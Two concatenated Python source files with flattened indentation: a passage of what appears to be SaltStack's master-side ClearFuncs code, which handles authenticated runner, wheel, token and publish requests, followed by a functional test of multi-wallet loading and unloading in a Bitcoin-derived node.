Allow a minion to request revocation of its own key
:param dict load: The minion payload
:rtype: dict
:return: If the load is invalid, it may be returned. No key operation is performed.
:rtype: bool
:return: True if key was revoked, False if not
"""
load = self.__verify_load(load, ("id", "tok"))
if not self.opts.get("allow_minion_key_revoke", False):
log.warning(
"Minion %s requested key revoke, but allow_minion_key_revoke "
"is set to False",
load["id"],
)
return load
if load is False:
return load
else:
return self.masterapi.revoke_auth(load)
def run_func(self, func, load):
"""
Wrapper for running functions executed with AES encryption
:param function func: The function to run
:return: The result of the master function that was called
"""
# Don't honor private functions
if func.startswith("__"):
# TODO: return some error? Seems odd to return {}
return {}, {"fun": "send"}
# Run the func
if hasattr(self, func):
try:
start = time.time()
ret = getattr(self, func)(load)
log.trace(
"Master function call %s took %s seconds", func, time.time() - start
)
except Exception: # pylint: disable=broad-except
ret = ""
log.error("Error in function %s:\n", func, exc_info=True)
else:
log.error(
"Received function %s which is unavailable on the master, "
"returning False",
func,
)
return False, {"fun": "send"}
# Don't encrypt the return value for the _return func
# (we don't care about the return value, so why encrypt it?)
if func == "_return":
return ret, {"fun": "send"}
if func == "_pillar" and "id" in load:
if load.get("ver") != "2" and self.opts["pillar_version"] == 1:
# Authorized to return old pillar proto
return ret, {"fun": "send"}
return ret, {"fun": "send_private", "key": "pillar", "tgt": load["id"]}
# Encrypt the return
return ret, {"fun": "send"}
class ClearFuncs(TransportMethods):
"""
    Set up functions that are safe to execute when commands are sent to the
    master without encryption or authentication
"""
# These methods will be exposed to the transport layer by
# MWorker._handle_clear
expose_methods = (
"ping",
"publish",
"get_token",
"mk_token",
"wheel",
"runner",
)
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key):
self.opts = opts
self.key = key
# Create the event manager
self.event = salt.utils.event.get_master_event(
self.opts, self.opts["sock_dir"], listen=False
)
# Make a client
self.local = salt.client.get_local_client(self.opts["conf_file"])
        # Make a minion checker object
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make an Auth object
self.loadauth = salt.auth.LoadAuth(opts)
# Stand up the master Minion to access returner data
self.mminion = salt.minion.MasterMinion(
self.opts, states=False, rend=False, ignore_config_errors=True
)
# Make a wheel object
self.wheel_ = salt.wheel.Wheel(opts)
# Make a masterapi object
self.masterapi = salt.daemons.masterapi.LocalFuncs(opts, key)
def runner(self, clear_load):
"""
Send a master control function back to the runner system
"""
# All runner ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get("error")
if error:
# Authentication error occurred: do not continue.
return {"error": error}
# Authorize
username = auth_check.get("username")
if auth_type != "user":
runner_check = self.ckminions.runner_check(
auth_check.get("auth_list", []),
clear_load["fun"],
clear_load.get("kwarg", {}),
)
if not runner_check:
return {
"error": {
"name": err_name,
"message": 'Authentication failure of type "{}" occurred for '
"user {}.".format(auth_type, username),
}
}
elif isinstance(runner_check, dict) and "error" in runner_check:
# A dictionary with an error name/message was handled by ckminions.runner_check
return runner_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if "user" in clear_load:
username = clear_load["user"]
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get("user", "root")
else:
username = salt.utils.user.get_user()
        # Authorized. Do the job!
        # Pop 'fun' outside the try block so the except handler below can
        # always reference it.
        fun = clear_load.pop("fun")
        try:
            runner_client = salt.runner.RunnerClient(self.opts)
return runner_client.asynchronous(
fun, clear_load.get("kwarg", {}), username, local=True
)
except Exception as exc: # pylint: disable=broad-except
log.error("Exception occurred while introspecting %s: %s", fun, exc)
return {
"error": {
"name": exc.__class__.__name__,
"args": exc.args,
"message": str(exc),
}
}
def wheel(self, clear_load):
"""
Send a master control function back to the wheel system
"""
# All wheel ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get("error")
if error:
# Authentication error occurred: do not continue.
return {"error": error}
# Authorize
username = auth_check.get("username")
if auth_type != "user":
wheel_check = self.ckminions.wheel_check(
auth_check.get("auth_list", []),
clear_load["fun"],
clear_load.get("kwarg", {}),
)
if not wheel_check:
return {
"error": {
"name": err_name,
"message": 'Authentication failure of type "{}" occurred for '
"user {}.".format(auth_type, username),
}
}
elif isinstance(wheel_check, dict) and "error" in wheel_check:
# A dictionary with an error name/message was handled by ckminions.wheel_check
return wheel_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if "user" in clear_load:
username = clear_load["user"]
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get("user", "root")
else:
username = salt.utils.user.get_user()
        # Authorized. Do the job!
        # Build jid, fun, tag and data outside the try block so the except
        # handler below can always reference them.
        jid = salt.utils.jid.gen_jid(self.opts)
        fun = clear_load.pop("fun")
        tag = tagify(jid, prefix="wheel")
        data = {
            "fun": "wheel.{}".format(fun),
            "jid": jid,
            "tag": tag,
            "user": username,
        }
        try:
            self.event.fire_event(data, tagify([jid, "new"], "wheel"))
ret = self.wheel_.call_func(fun, full_return=True, **clear_load)
data["return"] = ret["return"]
data["success"] = ret["success"]
self.event.fire_event(data, tagify([jid, "ret"], "wheel"))
return {"tag": tag, "data": data}
except Exception as exc: # pylint: disable=broad-except
log.error("Exception occurred while introspecting %s: %s", fun, exc)
data["return"] = "Exception occurred in wheel {}: {}: {}".format(
fun, exc.__class__.__name__, exc,
)
data["success"] = False
self.event.fire_event(data, tagify([jid, "ret"], "wheel"))
return {"tag": tag, "data": data}
def mk_token(self, clear_load):
"""
Create and return an authentication token, the clear load needs to
contain the eauth key and the needed authentication creds.
"""
token = self.loadauth.mk_token(clear_load)
if not token:
log.warning('Authentication failure of type "eauth" occurred.')
return ""
return token
def get_token(self, clear_load):
"""
Return the name associated with a token or False if the token is invalid
"""
if "token" not in clear_load:
return False
return self.loadauth.get_tok(clear_load["token"])
def publish(self, clear_load):
"""
This method sends out publications to the minions, it can only be used
by the LocalClient.
"""
extra = clear_load.get("kwargs", {})
publisher_acl = salt.acl.PublisherACL(self.opts["publisher_acl_blacklist"])
if publisher_acl.user_is_blacklisted(
clear_load["user"]
) or publisher_acl.cmd_is_blacklisted(clear_load["fun"]):
log.error(
"%s does not have permissions to run %s. Please contact "
"your local administrator if you believe this is in "
"error.\n",
clear_load["user"],
clear_load["fun"],
)
return {
"error": {
"name": "AuthorizationError",
"message": "Authorization error occurred.",
}
}
# Retrieve the minions list
delimiter = clear_load.get("kwargs", {}).get("delimiter", DEFAULT_TARGET_DELIM)
_res = self.ckminions.check_minions(
clear_load["tgt"], clear_load.get("tgt_type", "glob"), delimiter
)
minions = _res.get("minions", list())
missing = _res.get("missing", list())
ssh_minions = _res.get("ssh_minions", False)
# Check for external auth calls and authenticate
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(extra)
if auth_type == "user":
auth_check = self.loadauth.check_authentication(
clear_load, auth_type, key=key
)
else:
auth_check = self.loadauth.check_authentication(extra, auth_type)
# Setup authorization list variable and error information
auth_list = auth_check.get("auth_list", [])
err_msg = 'Authentication failure of type "{}" occurred.'.format(auth_type)
if auth_check.get("error"):
# Authentication error occurred: do not continue.
log.warning(err_msg)
return {
"error": {
"name": "AuthenticationError",
"message": "Authentication error occurred.",
}
}
# All Token, Eauth, and non-root users must pass the authorization check
if auth_type != "user" or (auth_type == "user" and auth_list):
# Authorize the request
authorized = self.ckminions.auth_check(
auth_list,
clear_load["fun"],
clear_load["arg"],
clear_load["tgt"],
clear_load.get("tgt_type", "glob"),
minions=minions,
# always accept find_job
whitelist=["saltutil.find_job"],
)
if not authorized:
# Authorization error occurred. Do not continue.
if (
auth_type == "eauth"
and not auth_list
and "username" in extra
and "eauth" in extra
):
log.debug(
'Auth configuration for eauth "%s" and user "%s" is empty',
extra["eauth"],
extra["username"],
)
log.warning(err_msg)
return {
"error": {
"name": "AuthorizationError",
"message": "Authorization error occurred.",
}
}
# Perform some specific auth_type tasks after the authorization check
if auth_type == "token":
username = auth_check.get("username")
clear_load["user"] = username
log.debug('Minion tokenized user = "%s"', username)
elif auth_type == "eauth":
# The username we are attempting to auth with
clear_load["user"] = self.loadauth.load_name(extra)
# If we order masters (via a syndic), don't short circuit if no minions
# are found
if not self.opts.get("order_masters"):
# Check for no minions
if not minions:
return {
"enc": "clear",
"load": {
"jid": None,
"minions": minions,
"error": "Master could not resolve minions for target {}".format(
clear_load["tgt"]
),
},
}
jid = self._prep_jid(clear_load, extra)
if jid is None:
return {"enc": "clear", "load": {"error": "Master failed to assign jid"}}
payload = self._prep_pub(minions, jid, clear_load, extra, missing)
# Send it!
self._send_ssh_pub(payload, ssh_minions=ssh_minions)
self._send_pub(payload)
return {
"enc": "clear",
"load": {"jid": clear_load["jid"], "minions": minions, "missing": missing},
}
def _prep_auth_info(self, clear_load):
sensitive_load_keys = []
key = None
if "token" in clear_load:
auth_type = "token"
err_name = "TokenAuthenticationError"
sensitive_load_keys = ["token"]
elif "eauth" in clear_load:
auth_type = "eauth"
err_name = "EauthAuthenticationError"
sensitive_load_keys = ["username", "password"]
else:
auth_type = "user"
err_name = "UserAuthenticationError"
key = self.key
return auth_type, err_name, key, sensitive_load_keys
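    # Illustrative mapping (derived from the branches above):
    #   {"token": "..."}       -> ("token", "TokenAuthenticationError", None, ["token"])
    #   {"eauth": "pam", ...}  -> ("eauth", "EauthAuthenticationError", None, ["username", "password"])
    #   anything else          -> ("user", "UserAuthenticationError", self.key, [])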
def _prep_jid(self, clear_load, extra):
"""
Return a jid for this publication
"""
# the jid in clear_load can be None, '', or something else. this is an
# attempt to clean up the value before passing to plugins
passed_jid = clear_load["jid"] if clear_load.get("jid") else None
nocache = extra.get("nocache", False)
# Retrieve the jid
fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
try:
# Retrieve the jid
jid = self.mminion.returners[fstr](nocache=nocache, passed_jid=passed_jid)
except (KeyError, TypeError):
# The returner is not present
msg = (
"Failed to allocate a jid. The requested returner '{}' "
"could not be loaded.".format(fstr.split(".")[0])
)
log.error(msg)
return {"error": msg}
return jid
def _send_pub(self, load):
"""
Take a load and send it across the network to connected minions
"""
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.publish(load)
@property
def ssh_client(self):
if not hasattr(self, "_ssh_client"):
self._ssh_client = salt.client.ssh.client.SSHClient(mopts=self.opts)
return self._ssh_client
def _send_ssh_pub(self, load, ssh_minions=False):
"""
Take a load and send it across the network to ssh minions
"""
if self.opts["enable_ssh_minions"] is True and ssh_minions is True:
log.debug("Send payload to ssh minions")
threading.Thread(target=self.ssh_client.cmd, kwargs=load).start()
def _prep_pub(self, minions, jid, clear_load, extra, missing):
"""
Take a given load and perform the necessary steps
to prepare a publication.
TODO: This is really only bound by temporal cohesion
and thus should be refactored even further.
"""
clear_load["jid"] = jid
delimiter = clear_load.get("kwargs", {}).get("delimiter", DEFAULT_TARGET_DELIM)
# TODO Error reporting over the master event bus
self.event.fire_event({"minions": minions}, clear_load["jid"])
new_job_load = {
"jid": clear_load["jid"],
"tgt_type": clear_load["tgt_type"],
"tgt": clear_load["tgt"],
"user": clear_load["user"],
"fun": clear_load["fun"],
"arg": clear_load["arg"],
"minions": minions,
"missing": missing,
}
# Announce the job on the event bus
self.event.fire_event(new_job_load, tagify([clear_load["jid"], "new"], "job"))
if self.opts["ext_job_cache"]:
fstr = "{}.save_load".format(self.opts["ext_job_cache"])
save_load_func = True
# Get the returner's save_load arg_spec.
try:
arg_spec = salt.utils.args.get_function_argspec(
self.mminion.returners[fstr]
)
# Check if 'minions' is included in returner's save_load arg_spec.
# This may be missing in custom returners, which we should warn about.
if "minions" not in arg_spec.args:
log.critical(
"The specified returner used for the external job cache "
"'%s' does not have a 'minions' kwarg in the returner's "
"save_load function.",
self.opts["ext_job_cache"],
)
except (AttributeError, KeyError):
save_load_func = False
log.critical(
"The specified returner used for the external job cache "
'"%s" does not have a save_load function!',
self.opts["ext_job_cache"],
)
if save_load_func:
try:
self.mminion.returners[fstr](
clear_load["jid"], clear_load, minions=minions
)
except Exception: # pylint: disable=broad-except
log.critical(
"The specified returner threw a stack trace:\n", exc_info=True
)
# always write out to the master job caches
try:
fstr = "{}.save_load".format(self.opts["master_job_cache"])
self.mminion.returners[fstr](clear_load["jid"], clear_load, minions)
except KeyError:
log.critical(
"The specified returner used for the master job cache "
'"%s" does not have a save_load function!',
self.opts["master_job_cache"],
)
except Exception: # pylint: disable=broad-except
log.critical("The specified returner threw a stack trace:\n", exc_info=True)
# Set up the payload
payload = {"enc": "aes"}
# Altering the contents of the publish load is serious!! Changes here
# break compatibility with minion/master versions and even tiny
# additions can have serious implications on the performance of the
# publish commands.
#
# In short, check with Thomas Hatch before you even think about
# touching this stuff, we can probably do what you want to do another
# way that won't have a negative impact.
load = {
"fun": clear_load["fun"],
"arg": clear_load["arg"],
"tgt": clear_load["tgt"],
"jid": clear_load["jid"],
"ret": clear_load["ret"],
}
# if you specified a master id, lets put that in the load
if "master_id" in self.opts:
load["master_id"] = self.opts["master_id"]
# if someone passed us one, use that
if "master_id" in extra:
load["master_id"] = extra["master_id"]
# Only add the delimiter to the pub data if it is non-default
if delimiter != DEFAULT_TARGET_DELIM:
load["delimiter"] = delimiter
if "id" in extra:
load["id"] = extra["id"]
if "tgt_type" in clear_load:
load["tgt_type"] = clear_load["tgt_type"]
if "to" in clear_load:
load["to"] = clear_load["to"]
if "kwargs" in clear_load:
if "ret_config" in clear_load["kwargs"]:
load["ret_config"] = clear_load["kwargs"].get("ret_config")
if "metadata" in clear_load["kwargs"]:
load["metadata"] = clear_load["kwargs"].get("metadata")
if "module_executors" in clear_load["kwargs"]:
load["module_executors"] = clear_load["kwargs"].get("module_executors")
if "executor_opts" in clear_load["kwargs"]:
load["executor_opts"] = clear_load["kwargs"].get("executor_opts")
if "ret_kwargs" in clear_load["kwargs"]:
load["ret_kwargs"] = clear_load["kwargs"].get("ret_kwargs")
if "user" in clear_load:
log.info(
"User %s Published command %s with jid %s",
clear_load["user"],
clear_load["fun"],
clear_load["jid"],
)
load["user"] = clear_load["user"]
else:
log.info(
"Published command %s with jid %s", clear_load["fun"], clear_load["jid"]
)
log.debug("Published command details %s", load)
return load
def ping(self, clear_load):
"""
Send the load back to the sender.
"""
return clear_load
|
wallet_multiwallet.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-2020 The Vadercoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a vadercoind node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import VadercoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
def test_load_unload(node, name):
global got_loading_error
while True:
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already loading' in e.error['message']:
got_loading_error = True
return
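# Note: several threads run test_load_unload concurrently (see run_test); the
# test passes once any one of them observes the 'Wallet already loading' RPC
# error (code -4) and sets the shared flag above.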
class MultiWalletTest(VadercoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
self.extra_args = [["-nowallet"], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if name == self.default_wallet_name:
return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
assert_equal(self.nodes[0].listwalletdir(), {'wallets': [{'name': self.default_wallet_name}]})
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
os.symlink('..', wallet_dir('recursive_dir_symlink'))
os.mkdir(wallet_dir('self_walletdat_symlink'))
os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
# create another dummy wallet for use in testing backups later
self.start_node(0)
node.createwallet("empty")
node.createwallet("plain")
node.createwallet("created")
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_file("empty"), empty_wallet)
shutil.rmtree(wallet_dir("empty"))
empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
shutil.rmtree(wallet_dir("created"))
os.rename(wallet_file("plain"), wallet_dir("w8"))
shutil.rmtree(wallet_dir("plain"))
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
# '' - to verify default wallet file is created correctly
to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create] # Wallets in the wallet dir
        in_wallet_dir.append('w7') # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink points to it
to_create.append(os.path.join(self.options.tmpdir, 'extern/w6')) # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
to_load = [self.default_wallet_name]
if not self.options.descriptors:
to_load.append('w8')
wallet_names = to_create + to_load # Wallet names loaded in the wallet
in_wallet_dir += to_load # The loaded wallets are also in the wallet dir
self.start_node(0)
for wallet_name in to_create:
self.nodes[0].createwallet(wallet_name)
for wallet_name in to_load:
self.nodes[0].loadwallet(wallet_name)
os.mkdir(wallet_dir('no_access'))
os.chmod(wallet_dir('no_access'), 0)
try:
with self.nodes[0].assert_debug_log(expected_msgs=['Error scanning']):
walletlist = self.nodes[0].listwalletdir()['wallets']
finally:
# Need to ensure access is restored for cleanup
os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))
assert_equal(set(node.listwallets()), set(wallet_names))
# should raise rpc error if wallet path can't be created
err_code = -4 if self.options.descriptors else -1
assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
self.start_node(0, ['-wallet=w1', '-wallet=w1'])
self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')
if not self.options.descriptors:
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
in_wallet_dir.append('w8_copy')
exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0)
self.nodes[0].createwallet("w4")
self.nodes[0].createwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
node.generatetoaddress(nblocks=1, address=w5.getnewaddress())
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
self.nodes[0].loadwallet("w4")
self.nodes[0].loadwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
self.nodes[0].createwallet(self.default_wallet_name)
if self.options.descriptors:
exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another vadercoind?"
else:
exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0)
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
node.generatetoaddress(nblocks=COINBASE_MATURITY + 1, address=w1.getnewaddress())
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2]))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
if self.options.descriptors:
assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another vadercoind?", self.nodes[0].loadwallet, wallet_names[0])
else:
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])
# This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
# Fail to load duplicate wallets by different ways (directory and filepath)
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
in_wallet_dir.append('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
        assert_raises_rpc_error(-8, "RPC endpoint wallet and wallet_name parameter specify different wallets", w1.unloadwallet, "w2")
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Unload w1 again, this time providing the wallet name twice
self.nodes[0].loadwallet("w1")
